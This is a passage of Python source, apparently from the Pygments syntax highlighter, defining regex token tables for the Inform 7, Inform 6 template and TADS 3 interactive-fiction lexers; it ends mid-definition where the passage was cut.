    flags = re.MULTILINE | re.DOTALL | re.UNICODE
    _dash = Inform6Lexer._dash
    _dquote = Inform6Lexer._dquote
    _newline = Inform6Lexer._newline
    _start = r'\A|(?<=[%s])' % _newline
    # There are three variants of Inform 7, differing in how to
    # interpret at signs and braces in I6T. In top-level inclusions, at
    # signs in the first column are inweb syntax. In phrase definitions
    # and use options, tokens in braces are treated as I7. Use options
    # also interpret "{N}".
    # One complete token table is built per variant at class-creation
    # time by the for-loop below.
    tokens = {}
    token_variants = ['+i6t-not-inline', '+i6t-inline', '+i6t-use-option']
    for level in token_variants:
        tokens[level] = {
            '+i6-root': list(Inform6Lexer.tokens['root']),
            '+i6t-root': [  # For Inform6TemplateLexer
                (r'[^%s]*' % Inform6Lexer._newline, Comment.Preproc,
                 ('directive', '+p'))
            ],
            'root': [
                (r'(\|?\s)+', Text),
                (r'\[', Comment.Multiline, '+comment'),
                (r'[%s]' % _dquote, Generic.Heading,
                 ('+main', '+titling', '+titling-string')),
                default(('+main', '+heading?'))
            ],
            '+titling-string': [
                (r'[^%s]+' % _dquote, Generic.Heading),
                (r'[%s]' % _dquote, Generic.Heading, '#pop')
            ],
            '+titling': [
                (r'\[', Comment.Multiline, '+comment'),
                (r'[^%s.;:|%s]+' % (_dquote, _newline), Generic.Heading),
                (r'[%s]' % _dquote, Generic.Heading, '+titling-string'),
                (r'[%s]{2}|(?<=[\s%s])\|[\s%s]' % (_newline, _dquote, _dquote),
                 Text, ('#pop', '+heading?')),
                (r'[.;:]|(?<=[\s%s])\|' % _dquote, Text, '#pop'),
                (r'[|%s]' % _newline, Generic.Heading)
            ],
            '+main': [
                (r'(?i)[^%s:a\[(|%s]+' % (_dquote, _newline), Text),
                (r'[%s]' % _dquote, String.Double, '+text'),
                (r':', Text, '+phrase-definition'),
                (r'(?i)\bas\b', Text, '+use-option'),
                (r'\[', Comment.Multiline, '+comment'),
                (r'(\([%s])(.*?)([%s]\))' % (_dash, _dash),
                 bygroups(Punctuation,
                          using(this, state=('+i6-root', 'directive'),
                                i6t='+i6t-not-inline'), Punctuation)),
                (r'(%s|(?<=[\s;:.%s]))\|\s|[%s]{2,}' %
                 (_start, _dquote, _newline), Text, '+heading?'),
                (r'(?i)[a(|%s]' % _newline, Text)
            ],
            '+phrase-definition': [
                (r'\s+', Text),
                (r'\[', Comment.Multiline, '+comment'),
                (r'(\([%s])(.*?)([%s]\))' % (_dash, _dash),
                 bygroups(Punctuation,
                          using(this, state=('+i6-root', 'directive',
                                             'default', 'statements'),
                                i6t='+i6t-inline'), Punctuation), '#pop'),
                default('#pop')
            ],
            '+use-option': [
                (r'\s+', Text),
                (r'\[', Comment.Multiline, '+comment'),
                (r'(\([%s])(.*?)([%s]\))' % (_dash, _dash),
                 bygroups(Punctuation,
                          using(this, state=('+i6-root', 'directive'),
                                i6t='+i6t-use-option'), Punctuation), '#pop'),
                default('#pop')
            ],
            '+comment': [
                (r'[^\[\]]+', Comment.Multiline),
                (r'\[', Comment.Multiline, '#push'),
                (r'\]', Comment.Multiline, '#pop')
            ],
            '+text': [
                (r'[^\[%s]+' % _dquote, String.Double),
                (r'\[.*?\]', String.Interpol),
                (r'[%s]' % _dquote, String.Double, '#pop')
            ],
            '+heading?': [
                (r'(\|?\s)+', Text),
                (r'\[', Comment.Multiline, '+comment'),
                (r'[%s]{4}\s+' % _dash, Text, '+documentation-heading'),
                (r'[%s]{1,3}' % _dash, Text),
                (r'(?i)(volume|book|part|chapter|section)\b[^%s]*' % _newline,
                 Generic.Heading, '#pop'),
                default('#pop')
            ],
            '+documentation-heading': [
                (r'\s+', Text),
                (r'\[', Comment.Multiline, '+comment'),
                (r'(?i)documentation\s+', Text, '+documentation-heading2'),
                default('#pop')
            ],
            '+documentation-heading2': [
                (r'\s+', Text),
                (r'\[', Comment.Multiline, '+comment'),
                (r'[%s]{4}\s' % _dash, Text, '+documentation'),
                default('#pop:2')
            ],
            '+documentation': [
                (r'(?i)(%s)\s*(chapter|example)\s*:[^%s]*' %
                 (_start, _newline), Generic.Heading),
                (r'(?i)(%s)\s*section\s*:[^%s]*' % (_start, _newline),
                 Generic.Subheading),
                (r'((%s)\t.*?[%s])+' % (_start, _newline),
                 using(this, state='+main')),
                (r'[^%s\[]+|[%s\[]' % (_newline, _newline), Text),
                (r'\[', Comment.Multiline, '+comment'),
            ],
            '+i6t-not-inline': [
                (r'(%s)@c( .*?)?([%s]|\Z)' % (_start, _newline),
                 Comment.Preproc),
                (r'(%s)@([%s]+|Purpose:)[^%s]*' % (_start, _dash, _newline),
                 Comment.Preproc),
                (r'(%s)@p( .*?)?([%s]|\Z)' % (_start, _newline),
                 Generic.Heading, '+p')
            ],
            '+i6t-use-option': [
                include('+i6t-not-inline'),
                (r'(\{)(N)(\})', bygroups(Punctuation, Text, Punctuation))
            ],
            '+i6t-inline': [
                (r'(\{)(\S[^}]*)?(\})',
                 bygroups(Punctuation, using(this, state='+main'),
                          Punctuation))
            ],
            '+i6t': [
                (r'(\{[%s])(![^}]*)(\}?)' % _dash,
                 bygroups(Punctuation, Comment.Single, Punctuation)),
                (r'(\{[%s])(lines)(:)([^}]*)(\}?)' % _dash,
                 bygroups(Punctuation, Keyword, Punctuation, Text,
                          Punctuation), '+lines'),
                (r'(\{[%s])([^:}]*)(:?)([^}]*)(\}?)' % _dash,
                 bygroups(Punctuation, Keyword, Punctuation, Text,
                          Punctuation)),
                (r'(\(\+)(.*?)(\+\)|\Z)',
                 bygroups(Punctuation, using(this, state='+main'),
                          Punctuation))
            ],
            '+p': [
                (r'[^@]+', Comment.Preproc),
                (r'(%s)@c( .*?)?([%s]|\Z)' % (_start, _newline),
                 Comment.Preproc, '#pop'),
                (r'(%s)@([%s]|Purpose:)' % (_start, _dash), Comment.Preproc),
                (r'(%s)@p( .*?)?([%s]|\Z)' % (_start, _newline),
                 Generic.Heading),
                (r'@', Comment.Preproc)
            ],
            '+lines': [
                (r'(%s)@c( .*?)?([%s]|\Z)' % (_start, _newline),
                 Comment.Preproc),
                (r'(%s)@([%s]|Purpose:)[^%s]*' % (_start, _dash, _newline),
                 Comment.Preproc),
                (r'(%s)@p( .*?)?([%s]|\Z)' % (_start, _newline),
                 Generic.Heading, '+p'),
                (r'(%s)@\w*[ %s]' % (_start, _newline), Keyword),
                (r'![^%s]*' % _newline, Comment.Single),
                (r'(\{)([%s]endlines)(\})' % _dash,
                 bygroups(Punctuation, Keyword, Punctuation), '#pop'),
                (r'[^@!{]+?([%s]|\Z)|.' % _newline, Text)
            ]
        }
        # Inform 7 can include snippets of Inform 6 template language,
        # so all of Inform6Lexer's states are copied here, with
        # modifications to account for template syntax. Inform7Lexer's
        # own states begin with '+' to avoid name conflicts. Some of
        # Inform6Lexer's states begin with '_': these are not modified.
        # They deal with template syntax either by including modified
        # states, or by matching r'' then pushing to modified states.
        for token in Inform6Lexer.tokens:
            if token == 'root':
                continue
            tokens[level][token] = list(Inform6Lexer.tokens[token])
            if not token.startswith('_'):
                tokens[level][token][:0] = [include('+i6t'), include(level)]

    def __init__(self, **options):
        """Select the compiled token table matching the ``i6t`` option."""
        level = options.get('i6t', '+i6t-not-inline')
        if level not in self._all_tokens:
            # Compile and cache the requested variant on first use.
            self._tokens = self.__class__.process_tokendef(level)
        else:
            self._tokens = self._all_tokens[level]
        RegexLexer.__init__(self, **options)
class Inform6TemplateLexer(Inform7Lexer):
    """
    For `Inform 6 template
    <http://inform7.com/sources/src/i6template/Woven/index.html>`_ code.
    .. versionadded:: 2.0
    """
    name = 'Inform 6 template'
    aliases = ['i6t']
    filenames = ['*.i6t']
    def get_tokens_unprocessed(self, text, stack=('+i6t-root',)):
        # Reuse Inform7Lexer's machinery, but start lexing in the
        # template-root state rather than the Inform 7 source state.
        return Inform7Lexer.get_tokens_unprocessed(self, text, stack)
class Tads3Lexer(RegexLexer):
    """
    For `TADS 3 <http://www.tads.org/>`_ source code.

    Many near-identical string/tag/attribute states (single vs. double
    quotes, triple vs. single quoting, HTML-like tags inside strings) are
    generated by the ``_make_*_state`` factory helpers below rather than
    written out by hand.
    """
    name = 'TADS 3'
    aliases = ['tads3']
    filenames = ['*.t']
    flags = re.DOTALL | re.MULTILINE
    # Reusable regex fragments, interpolated into the token tables below.
    _comment_single = r'(?://(?:[^\\\n]|\\+[\w\W])*$)'
    _comment_multiline = r'(?:/\*(?:[^*]|\*(?!/))*\*/)'
    _escape = (r'(?:\\(?:[\n\\<>"\'^v bnrt]|u[\da-fA-F]{,4}|x[\da-fA-F]{,2}|'
               r'[0-3]?[0-7]{1,2}))')
    _name = r'(?:[_a-zA-Z]\w*)'
    _no_quote = r'(?=\s|\\?>)'
    _operator = (r'(?:&&|\|\||\+\+|--|\?\?|::|[.,@\[\]~]|'
                 r'(?:[=+\-*/%!&|^]|<<?|>>?>?)=?)')
    _ws = r'(?:\\|\s|%s|%s)' % (_comment_single, _comment_multiline)
    _ws_pp = r'(?:\\\n|[^\S\n]|%s|%s)' % (_comment_single, _comment_multiline)
    def _make_string_state(triple, double, verbatim=None, _escape=_escape):
        # Factory for string-body states: handles closing quotes, escape
        # sequences, `{...}` interpolation, entities and embedded HTML-like
        # tags. `verbatim`, when given, names a tag (e.g. 'xmp') whose body
        # suppresses normal tag/entity handling until its closing tag.
        if verbatim:
            verbatim = ''.join(['(?:%s|%s)' % (re.escape(c.lower()),
                                               re.escape(c.upper()))
                                for c in verbatim])
        char = r'"' if double else r"'"
        token = String.Double if double else String.Single
        escaped_quotes = r'+|%s(?!%s{2})' % (char, char) if triple else r''
        prefix = '%s%s' % ('t' if triple else '', 'd' if double else 's')
        tag_state_name = '%sqt' % prefix
        state = []
        if triple:
            state += [
                (r'%s{3,}' % char, token, '#pop'),
                (r'\\%s+' % char, String.Escape),
                (char, token)
            ]
        else:
            state.append((char, token, '#pop'))
        state += [
            include('s/verbatim'),
            (r'[^\\<&{}%s]+' % char, token)
        ]
        if verbatim:
            # This regex can't use `(?i)` because escape sequences are
            # case-sensitive. `<\XMP>` works; `<\xmp>` doesn't.
            state.append((r'\\?<(/|\\\\|(?!%s)\\)%s(?=[\s=>])' %
                          (_escape, verbatim),
                          Name.Tag, ('#pop', '%sqs' % prefix, tag_state_name)))
        else:
            state += [
                (r'\\?<!([^><\\%s]|<(?!<)|\\%s%s|%s|\\.)*>?' %
                 (char, char, escaped_quotes, _escape), Comment.Multiline),
                (r'(?i)\\?<listing(?=[\s=>]|\\>)', Name.Tag,
                 ('#pop', '%sqs/listing' % prefix, tag_state_name)),
                (r'(?i)\\?<xmp(?=[\s=>]|\\>)', Name.Tag,
                 ('#pop', '%sqs/xmp' % prefix, tag_state_name)),
                (r'\\?<([^\s=><\\%s]|<(?!<)|\\%s%s|%s|\\.)*' %
                 (char, char, escaped_quotes, _escape), Name.Tag,
                 tag_state_name),
                include('s/entity')
            ]
        state += [
            include('s/escape'),
            (r'\{([^}<\\%s]|<(?!<)|\\%s%s|%s|\\.)*\}' %
             (char, char, escaped_quotes, _escape), String.Interpol),
            (r'[\\&{}<]', token)
        ]
        return state
    def _make_tag_state(triple, double, _escape=_escape):
        # Factory for the inside-a-tag state (attributes, `=value` pairs);
        # pops back out of both the tag and the string on the closing quote.
        char = r'"' if double else r"'"
        quantifier = r'{3,}' if triple else r''
        state_name = '%s%sqt' % ('t' if triple else '', 'd' if double else 's')
        token = String.Double if double else String.Single
        escaped_quotes = r'+|%s(?!%s{2})' % (char, char) if triple else r''
        return [
            (r'%s%s' % (char, quantifier), token, '#pop:2'),
            (r'(\s|\\\n)+', Text),
            (r'(=)(\\?")', bygroups(Punctuation, String.Double),
             'dqs/%s' % state_name),
            (r"(=)(\\?')", bygroups(Punctuation, String.Single),
             'sqs/%s' % state_name),
            (r'=', Punctuation, 'uqs/%s' % state_name),
            (r'\\?>', Name.Tag, '#pop'),
            (r'\{([^}<\\%s]|<(?!<)|\\%s%s|%s|\\.)*\}' %
             (char, char, escaped_quotes, _escape), String.Interpol),
            (r'([^\s=><\\%s]|<(?!<)|\\%s%s|%s|\\.)+' %
             (char, char, escaped_quotes, _escape), Name.Attribute),
            include('s/escape'),
            include('s/verbatim'),
            include('s/entity'),
            (r'[\\{}&]', Name.Attribute)
        ]
    def _make_attribute_value_state(terminator, host_triple, host_double,
                                    _escape=_escape):
        # Factory for attribute-value states (quoted or unquoted values)
        # nested inside a tag, itself nested inside a host string.
        token = (String.Double if terminator == r'"' else
                 String.Single if terminator == r"'" else String.Other)
        host_char = r'"' if host_double else r"'"
        host_quantifier = r'{3,}' if host_triple else r''
        host_token = String.Double if host_double else String.Single
        escaped_quotes = (r'+|%s(?!%s{2})' % (host_char, host_char)
                          if host_triple else r'')
        return [
            (r'%s%s' % (host_char, host_quantifier), host_token, '#pop:3'),
            (r'%s%s' % (r'' if token is String.Other else r'\\?', terminator),
             token, '#pop'),
            include('s/verbatim'),
            include('s/entity'),
            (r'\{([^}<\\%s]|<(?!<)|\\%s%s|%s|\\.)*\}' %
             (host_char, host_char, escaped_quotes, _escape), String.Interpol),
            (r'([^\s"\'<%s{}\\&])+' % (r'>' if token is String.Other else r''),
             token),
            include('s/escape'),
            (r'["\'\s&{<}\\]', token)
        ]
    tokens = {
        'root': [
            (u'\ufeff', Text),
            (r'\{', Punctuation, 'object-body'),
            (r';+', Punctuation),
            (r'(?=(argcount|break|case|catch|continue|default|definingobj|'
             r'delegated|do|else|for|foreach|finally|goto|if|inherited|'
             r'invokee|local|nil|new|operator|replaced|return|self|switch|'
             r'targetobj|targetprop|throw|true|try|while)\b)', Text, 'block'),
            (r'(%s)(%s*)(\()' % (_name, _ws),
             bygroups(Name.Function, using(this, state='whitespace'),
                      Punctuation),
             ('block?/root', 'more/parameters', 'main/parameters')),
            include('whitespace'),
            (r'\++', Punctuation),
            (r'[^\s!"%-(*->@-_a-z{-~]+', Error),  # Averts an infinite loop
            (r'(?!\Z)', Text, 'main/root')
        ],
        'main/root': [
            include('main/basic'),
            default(('#pop', 'object-body/no-braces', 'classes', 'class'))
        ],
        'object-body/no-braces': [
            (r';', Punctuation, '#pop'),
            (r'\{', Punctuation, ('#pop', 'object-body')),
            include('object-body')
        ],
        'object-body': [
            (r';', Punctuation),
            (r'\{', Punctuation, '#push'),
            (r'\}', Punctuation, '#pop'),
            (r':', Punctuation, ('classes', 'class')),
            (r'(%s?)(%s*)(\()' % (_name, _ws),
             bygroups(Name.Function, using(this, state='whitespace'),
                      Punctuation),
             ('block?', 'more/parameters', 'main/parameters')),
            (r'(%s)(%s*)(\{)' % (_name, _ws),
             bygroups(Name.Function, using(this, state='whitespace'),
                      Punctuation), 'block'),
            (r'(%s)(%s*)(:)' % (_name, _ws),
             bygroups(Name.Variable, using(this, state='whitespace'),
                      Punctuation),
             ('object-body/no-braces', 'classes', 'class')),
            include('whitespace'),
            (r'->|%s' % _operator, Punctuation, 'main'),
            default('main/object-body')
        ],
        'main/object-body': [
            include('main/basic'),
            (r'(%s)(%s*)(=?)' % (_name, _ws),
             bygroups(Name.Variable, using(this, state='whitespace'),
                      Punctuation), ('#pop', 'more', 'main')),
            default('#pop:2')
        ],
        'block?/root': [
            (r'\{', Punctuation, ('#pop', 'block')),
            include('whitespace'),
            (r'(?=[[\'"<(:])', Text,  # It might be a VerbRule macro.
             ('#pop', 'object-body/no-braces', 'grammar', 'grammar-rules')),
            # It might be a macro like DefineAction.
            default(('#pop', 'object-body/no-braces'))
        ],
        'block?': [
            (r'\{', Punctuation, ('#pop', 'block')),
            include('whitespace'),
            default('#pop')
        ],
        'block/basic': [
            (r'[;:]+', Punctuation),
            (r'\{', Punctuation, '#push'),
            (r'\}', Punctuation, '#pop'),
            (r'default\b', Keyword.Reserved),
            (r'(%s)(%s*)(:)' % (_name, _ws),
             bygroups(Name.Label, using(this, state='whitespace'),
                      Punctuation)),
            include('whitespace')
        ],
        'block': [
            include('block/basic'),
            (r'(?!\Z)', Text, ('more', 'main'))
        ],
        'block/embed': [
            (r'>>', String.Interpol, '#pop'),
            include('block/basic'),
            (r'(?!\Z)', Text, ('more/embed', 'main'))
        ],
        'main/basic': [
            include('whitespace'),
            (r'\(', Punctuation, ('#pop', 'more', 'main')),
            (r'\[', Punctuation, ('#pop', 'more/list', 'main')),
            (r'\{', Punctuation, ('#pop', 'more/inner', 'main/inner',
                                  'more/parameters', 'main/parameters')),
            (r'\*|\.{3}', Punctuation, '#pop'),
            (r'(?i)0x[\da-f]+', Number.Hex, '#pop'),
            (r'(\d+\.(?!\.)\d*|\.\d+)([eE][-+]?\d+)?|\d+[eE][-+]?\d+',
             Number.Float, '#pop'),
            (r'0[0-7]+', Number.Oct, '#pop'),
            (r'\d+', Number.Integer, '#pop'),
            (r'"""', String.Double, ('#pop', 'tdqs')),
            (r"'''", String.Single, ('#pop', 'tsqs')),
            (r'"', String.Double, ('#pop', 'dqs')),
            (r"'", String.Single, ('#pop', 'sqs')),
            (r'R"""', String.Regex, ('#pop', 'tdqr')),
            (r"R'''", String.Regex, ('#pop', 'tsqr')),
            (r'R"', String.Regex, ('#pop', 'dqr')),
            (r"R'", String.Regex, ('#pop', 'sqr')),
            # Two-token keywords
            (r'(extern)(%s+)(object\b)' % _ws,
             bygroups(Keyword.Reserved, using(this, state='whitespace'),
                      Keyword.Reserved)),
            (r'(function|method)(%s*)(\()' % _ws,
             bygroups(Keyword.Reserved, using(this, state='whitespace'),
                      Punctuation),
             ('#pop', 'block?', 'more/parameters', 'main/parameters')),
            (r'(modify)(%s+)(grammar\b)' % _ws,
             bygroups(Keyword.Reserved, using(this, state='whitespace'),
                      Keyword.Reserved),
             ('#pop', 'object-body/no-braces', ':', 'grammar')),
            (r'(new)(%s+(?=(?:function|method)\b))' % _ws,
             bygroups(Keyword.Reserved, using(this, state='whitespace'))),
            (r'(object)(%s+)(template\b)' % _ws,
             bygroups(Keyword.Reserved, using(this, state='whitespace'),
                      Keyword.Reserved), ('#pop', 'template')),
            (r'(string)(%s+)(template\b)' % _ws,
             bygroups(Keyword, using(this, state='whitespace'),
                      Keyword.Reserved), ('#pop', 'function-name')),
            # Keywords
            (r'(argcount|definingobj|invokee|replaced|targetobj|targetprop)\b',
             Name.Builtin, '#pop'),
            (r'(break|continue|goto)\b', Keyword.Reserved, ('#pop', 'label')),
            (r'(case|extern|if|intrinsic|return|static|while)\b',
             Keyword.Reserved),
            (r'catch\b', Keyword.Reserved, ('#pop', 'catch')),
            (r'class\b', Keyword.Reserved,
             ('#pop', 'object-body/no-braces', 'class')),
            (r'(default|do|else|finally|try)\b', Keyword.Reserved, '#pop'),
            (r'(dictionary|property)\b', Keyword.Reserved,
             ('#pop', 'constants')),
            (r'enum\b', Keyword.Reserved, ('#pop', 'enum')),
            (r'export\b', Keyword.Reserved, ('#pop', 'main')),
            (r'(for|foreach)\b', Keyword.Reserved,
             ('#pop', 'more/inner', 'main/inner')),
            (r'(function|method)\b', Keyword.Reserved,
             ('#pop', 'block?', 'function-name')),
            (r'grammar\b', Keyword.Reserved,
             ('#pop', 'object-body/no-braces', 'grammar')),
            (r'inherited\b', Keyword.Reserved, ('#pop', 'inherited')),
            (r'local\b', Keyword.Reserved,
             ('#pop', 'more/local', 'main/local')),
            (r'(modify|replace|switch|throw|transient)\b', Keyword.Reserved,
             '#pop'),
            (r'new\b', Keyword.Reserved, ('#pop', 'class')),
            (r'(nil|true)\b', Keyword.Constant, '#pop'),
            (r'object\b', Keyword.Reserved, ('#pop', 'object-body/no-braces')),
            (r'operator\b', Keyword.Reserved, ('#pop', 'operator')),
            (r'propertyset\b', Keyword.Reserved,
             ('#pop', 'propertyset', 'main')),
            (r'self\b', Name.Builtin.Pseudo, '#pop'),
            (r'template\b', Keyword.Reserved, ('#pop', 'template')),
            # Operators
            (r'(__objref|defined)(%s*)(\()' % _ws,
             bygroups(Operator.Word, using(this, state='whitespace'),
                      Operator), ('#pop', 'more/__objref', 'main')),
            (r'delegated\b', Operator.Word),
            # Compiler-defined macros and built-in properties
            (r'(__DATE__|__DEBUG|__LINE__|__FILE__|'
             r'__TADS_MACRO_FORMAT_VERSION|__TADS_SYS_\w*|__TADS_SYSTEM_NAME|'
             r'__TADS_VERSION_MAJOR|__TADS_VERSION_MINOR|__TADS3|__TIME__|'
             r'construct|finalize|grammarInfo|grammarTag|lexicalParent|'
             r'miscVocab|sourceTextGroup|sourceTextGroupName|'
             r'sourceTextGroupOrder|sourceTextOrder)\b', Name.Builtin, '#pop')
        ],
        'main': [
            include('main/basic'),
            (_name, Name, '#pop'),
            default('#pop')
        ],
        'more/basic': [
            (r'\(', Punctuation, ('more/list', 'main')),
            (r'\[', Punctuation, ('more', 'main')),
            (r'\.{3}', Punctuation),
            (r'->|\.\.', Punctuation, 'main'),
            (r'(?=;)|[:)\]]', Punctuation, '#pop'),
            include('whitespace'),
            (_operator, Operator, 'main'),
            (r'\?', Operator, ('main', 'more/conditional', 'main')),
            (r'(is|not)(%s+)(in\b)' % _ws,
             bygroups(Operator.Word, using(this, state='whitespace'),
                      Operator.Word)),
            (r'[^\s!"%-_a-z{-~]+', Error)  # Averts an infinite loop
        ],
        'more': [
            include('more/basic'),
            default('#pop')
        ],
        # Then expression (conditional operator)
        'more/conditional': [
            (r':(?!:)', Operator, '#pop'),
            include('more')
        ],
        # Embedded expressions
        'more/embed': [
            (r'>>', String.Interpol, '#pop:2'),
            include('more')
        ],
        # For/foreach loop initializer or short-form anonymous function
        'main/inner': [
            (r'\(', Punctuation, ('#pop', 'more/inner', 'main/inner')),
            (r'local\b', Keyword.Reserved, ('#pop', 'main/local')),
            include('main')
        ],
        'more/inner': [
            (r'\}', Punctuation, '#pop'),
            (r',', Punctuation, 'main/inner'),
            (r'(in|step)\b', Keyword, 'main/inner'),
            include('more')
        ],
        # Local
        'main/local': [
            (_name, Name.Variable, '#pop'),
            include('whitespace')
        ],
        'more/local': [
            (r',', Punctuation, 'main/local'),
            include('more')
        ],
        # List
        'more/list': [
            (r'[,:]', Punctuation, 'main'),
            include('more')
        ],
        # Parameter list
        'main/parameters': [
            (r'(%s)(%s*)(?=:)' % (_name, _ws),
             bygroups(Name.Variable, using(this, state='whitespace')), '#pop'),
            (r'(%s)(%s+)(%s)' % (_name, _ws, _name),
             bygroups(Name.Class, using(this, state='whitespace'),
                      Name.Variable), '#pop'),
            (r'\[+', Punctuation),
            include('main/basic'),
            (_name, Name.Variable, '#pop'),
            default('#pop')
        ],
        'more/parameters': [
            (r'(:)(%s*(?=[?=,:)]))' % _ws,
             bygroups(Punctuation, using(this, state='whitespace'))),
            (r'[?\]]+', Punctuation),
            (r'[:)]', Punctuation, ('#pop', 'multimethod?')),
            (r',', Punctuation, 'main/parameters'),
            (r'=', Punctuation, ('more/parameter', 'main')),
            include('more')
        ],
        'more/parameter': [
            (r'(?=[,)])', Text, '#pop'),
            include('more')
        ],
        'multimethod?': [
            (r'multimethod\b', Keyword, '#pop'),
            include('whitespace'),
            default('#pop')
        ],
        # Statements and expressions
        'more/__objref': [
            (r',', Punctuation, 'mode'),
            (r'\)', Operator, '#pop'),
            include('more')
        ],
        'mode': [
            (r'(error|warn)\b', Keyword, '#pop'),
            include('whitespace')
        ],
        'catch': [
            (r'\(+', Punctuation),
            (_name, Name.Exception, ('#pop', 'variables')),
            include('whitespace')
        ],
        'enum': [
            include('whitespace'),
            (r'token\b', Keyword, ('#pop', 'constants')),
            default(('#pop', 'constants'))
        ],
        'grammar': [
            (r'\)+', Punctuation),
            (r'\(', Punctuation, 'grammar-tag'),
            (r':', Punctuation, 'grammar-rules'),
            (_name, Name.Class),
            include('whitespace')
        ],
        'grammar-tag': [
            include('whitespace'),
            (r'"""([^\\"<]|""?(?!")|\\"+|\\.|<(?!<))+("{3,}|<<)|'
             r'R"""([^\\"]|""?(?!")|\\"+|\\.)+"{3,}|'
             r"'''([^\\'<]|''?(?!')|\\'+|\\.|<(?!<))+('{3,}|<<)|"
             r"R'''([^\\']|''?(?!')|\\'+|\\.)+'{3,}|"
             r'"([^\\"<]|\\.|<(?!<))+("|<<)|R"([^\\"]|\\.)+"|'
             r"'([^\\'<]|\\.|<(?!<))+('|<<)|R'([^\\']|\\.)+'|"
             r"([^)\s\\/]|/(?![/*]))+|\)", String.Other, '#pop')
        ],
        'grammar-rules': [
            include('string'),
            include('whitespace'),
            (r'(\[)(%s*)(badness)' % _ws,
             bygroups(Punctuation, using(this, state='whitespace'), Keyword),
             'main'),
            (r'->|%s|[()]' % _operator, Punctuation),
            (_name, Name.Constant),
            default('#pop:2')
        ],
        ':': [
            (r':', Punctuation, '#pop')
        ],
        'function-name': [
            (r'(<<([^>]|>>>|>(?!>))*>>)+', String.Interpol),
            (r'(?=%s?%s*[({])' % (_name, _ws), Text, '#pop'),
            (_name, Name.Function, '#pop'),
            include('whitespace')
        ],
        'inherited': [
            (r'<', Punctuation, ('#pop', 'classes', 'class')),
            include('whitespace'),
            (_name, Name.Class, '#pop'),
            default('#pop')
        ],
        'operator': [
            (r'negate\b', Operator.Word, '#pop'),
            include('whitespace'),
            (_operator, Operator),
            default('#pop')
        ],
        'propertyset': [
            (r'\(', Punctuation, ('more/parameters', 'main/parameters')),
            (r'\{', Punctuation, ('#pop', 'object-body')),
            include('whitespace')
        ],
        'template': [
            (r'(?=;)', Text, '#pop'),
            include('string'),
            (r'inherited\b', Keyword.Reserved),
            include('whitespace'),
            (r'->|\?|%s' % _operator, Punctuation),
            (_name, Name.Variable)
        ],
        # Identifiers
        'class': [
            (r'\*|\.{3}', Punctuation, '#pop'),
            (r'object\b', Keyword.Reserved, '#pop'),
            (r'transient\b', Keyword.Reserved),
            (_name, Name.Class, '#pop'),
            include('whitespace'),
            default('#pop')
        ],
        'classes': [
            (r'[:,]', Punctuation, 'class'),
            include('whitespace'),
            (r'>', Punctuation, '#pop'),
            default('#pop')
        ],
        'constants': [
            (r',+', Punctuation),
            (r';', Punctuation, '#pop'),
            (r'property\b', Keyword.Reserved),
            (_name, Name.Constant),
            include('whitespace')
        ],
        'label': [
            (_name, Name.Label, '#pop'),
            include('whitespace'),
            default('#pop')
        ],
        'variables': [
            (r',+', Punctuation),
            (r'\)', Punctuation, '#pop'),
            include('whitespace'),
            (_name, Name.Variable)
        ],
        # Whitespace and comments
        'whitespace': [
            (r'^%s*#(%s|[^\n]|(?<=\\)\n)*\n?' % (_ws_pp, _comment_multiline),
             Comment.Preproc),
            (_comment_single, Comment.Single),
            (_comment_multiline, Comment.Multiline),
            (r'\\+\n+%s*#?|\n+|([^\S\n]|\\)+' % _ws_pp, Text)
        ],
        # Strings
        'string': [
            (r'"""', String.Double, 'tdqs'),
            (r"'''", String.Single, 'tsqs'),
            (r'"', String.Double, 'dqs'),
            (r"'", String.Single, 'sqs')
        ],
        's/escape': [
            (r'\{\{|\}\}|%s' % _escape, String.Escape)
        ],
        's/verbatim': [
            (r'<<\s*(as\s+decreasingly\s+likely\s+outcomes|cycling|else|end|'
             r'first\s+time|one\s+of|only|or|otherwise|'
             r'(sticky|(then\s+)?(purely\s+)?at)\s+random|stopping|'
             r'(then\s+)?(half\s+)?shuffled|\|\|)\s*>>', String.Interpol),
            (r'<<(%%(_(%s|\\?.)|[\-+ ,#]|\[\d*\]?)*\d*\.?\d*(%s|\\?.)|'
             r'\s*((else|otherwise)\s+)?(if|unless)\b)?' % (_escape, _escape),
             String.Interpol, ('block/embed', 'more/embed', 'main'))
        ],
        's/entity': [
            (r'(?i)&(#(x[\da-f]+|\d+)|[a-z][\da-z]*);?', Name.Entity)
        ],
        # String states generated by the factory above: the name encodes
        # (t)riple, (d)ouble/(s)ingle quoting; /listing and /xmp variants
        # are inside the corresponding verbatim tags.
        'tdqs': _make_string_state(True, True),
        'tsqs': _make_string_state(True, False),
        'dqs': _make_string_state(False, True),
        'sqs': _make_string_state(False, False),
        'tdqs/listing': _make_string_state(True, True, 'listing'),
        'tsqs/listing': _make_string_state(True, False, 'listing'),
        'dqs/listing': _make_string_state(False, True, 'listing'),
        'sqs/listing': _make_string_state(False, False, 'listing'),
        'tdqs/xmp': _make_string_state(True, True, 'xmp'),
        'tsqs/xmp': _make_string_state(True, False, 'xmp'),
        'dqs/xmp': _make_string_state(False, True, 'xmp'),
        'sqs/xmp': _make_string_state(False, False, 'xmp'),
        # Tags
        'tdqt': _make_tag_state(True, True),
        'tsqt': _make_tag_state(True, False),
        'dqt': _make_tag_state(False, True),
        'sqt': _make_tag_state(False, False),
        # Attribute values: (d)ouble/(s)ingle-quoted or (u)nquoted, within
        # each host tag state.
        'dqs/tdqt': _make_attribute_value_state(r'"', True, True),
        'dqs/tsqt': _make_attribute_value_state(r'"', True, False),
        'dqs/dqt': _make_attribute_value_state(r'"', False, True),
        'dqs/sqt': _make_attribute_value_state(r'"', False, False),
        'sqs/tdqt': _make_attribute_value_state(r"'", True, True),
        'sqs/tsqt': _make_attribute_value_state(r"'", True, False),
        'sqs/dqt': _make_attribute_value_state(r"'", False, True),
        'sqs/sqt': _make_attribute_value_state(r"'", False, False),
        'uqs/tdqt': _make_attribute_value_state(_no_quote, True, True),
        'uqs/tsqt': _make_attribute_value_state(_no_quote, True, False),
        'uqs/dqt': _make_attribute_value_state(_no_quote, False, True),
        'uqs/sqt': _make_attribute_value_state(_no_quote, False, False),
        # Regular expressions
        'tdqr': [
            (r'[^\\"]+', String.Regex),
            (r'\\"*', String.Regex),
            (r'"{3,}', String.Regex, '#pop'),
            (r'"', String.Regex)
        ],
        'tsqr': [
            (r"[^\\']+", String.Regex),
            (r"\\'*", String.Regex),
            (r"'{3,}", String.Regex, '#pop'),
            (r"'", String.Regex)
        ],
        'dqr': [
            (r'[^\\"]+', String.Regex),
            (r'\\"?', String.Regex),
            (r'"', String.Regex, '#pop')
        ],
        'sqr': [
